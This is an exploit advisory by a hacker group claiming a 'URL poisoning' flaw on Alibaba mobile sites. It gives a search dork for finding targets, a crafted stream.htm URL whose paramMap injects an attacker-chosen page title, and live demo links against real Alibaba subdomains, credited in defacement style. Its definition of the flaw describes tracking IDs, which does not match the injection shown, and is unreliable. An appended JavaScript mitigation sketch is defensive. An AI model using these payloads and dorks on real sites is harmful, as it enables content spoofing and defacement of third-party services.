#############################################################
# Exploit Title: Alibaba Group - URL Poisoning
# Google Dork: site:m.*.alibaba.com inurl:/stream.html?
# Date: 2020-09-29
# Exploit Author: Gh05t666nero
# Team: IndoGhostSec
# Vendor: alibaba.com
# Software Version: *
# Software Link: N/A
# Tested on: Linux 4.14.117-perf+ #2 SMP PREEMPT Tue Sep 29 14:54:50 CST 2020 aarch64 Android
#############################################################
[*] Vuln Info:
==============
URL poisoning, also known as location poisoning, is a method of tracking Web user behavior by adding an identification (ID) number to the page address (Uniform Resource Locator) line of the Web browser when a user visits a particular site.
#############################################################
[*] Vulnerable path:
====================
/stream.htm
#############################################################
[*] Exploit:
============
/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D
#############################################################
[*] Demo:
=========
https://m.arabic.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D
https://m.spanish.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D
https://m.french.alibaba.com/stream.htm?spm=a2706.8172434.mIndustryTab.3.3b2948da0fd1pX&page=category_3&paramMap=%7B%22title%22%3A%22Poisoned%20by%20Gh05t666nero%20ft%20IndoGhostSec%22%7D
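[*] Mitigation sketch (added example, not part of the original advisory and not Alibaba's code):
In the URLs above, paramMap is a URL-encoded JSON object with a title field. Assuming the page displays that field, one server-side fix is to take the title from a table keyed by the page parameter and only compare the client-supplied value for logging. PAGE_TITLES, resolveTitle, escapeHtml and the sample titles are hypothetical.

```javascript
// Added example, not Alibaba's code. PAGE_TITLES, resolveTitle and escapeHtml
// are hypothetical names; the titles are constructed sample values.
const PAGE_TITLES = new Map([
  ["category_3", "Category 3"],
  ["category_4", "Category 4"],
]);

// Encode the characters that matter in an HTML text or attribute context.
function escapeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Decide which title to render for a /stream.htm request.
// The title comes from the server-side table keyed by `page`; a client-supplied
// paramMap.title is only compared against it so mismatches can be logged.
function resolveTitle(requestUrl) {
  // The base URL is a placeholder so that path-only request lines parse.
  const url = new URL(requestUrl, "https://placeholder.invalid");
  const page = url.searchParams.get("page");
  const title = PAGE_TITLES.get(page);
  if (title === undefined) {
    return { ok: false, reason: "unknown page", title: null };
  }

  const raw = url.searchParams.get("paramMap"); // already percent-decoded
  let supplied = null;
  if (raw !== null) {
    try {
      const parsed = JSON.parse(raw);
      if (parsed !== null && typeof parsed === "object" && typeof parsed.title === "string") {
        supplied = parsed.title;
      }
    } catch (err) {
      // Malformed JSON is rejected instead of being passed on to a template.
      return { ok: false, reason: "paramMap is not valid JSON", title: escapeHtml(title) };
    }
  }

  // tampered === true means the request carried a title the server never issued.
  const tampered = supplied !== null && supplied !== title;
  return { ok: true, tampered, supplied, title: escapeHtml(title) };
}
```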
#############################################################
[*] Contact:
============
# Website: www.anonsec.my.id
# Telegram: t.me/Gh05t666nero
# Instagram: instagram.com/ojan_cxs
# Twitter: twitter.com/Gh05t666nero1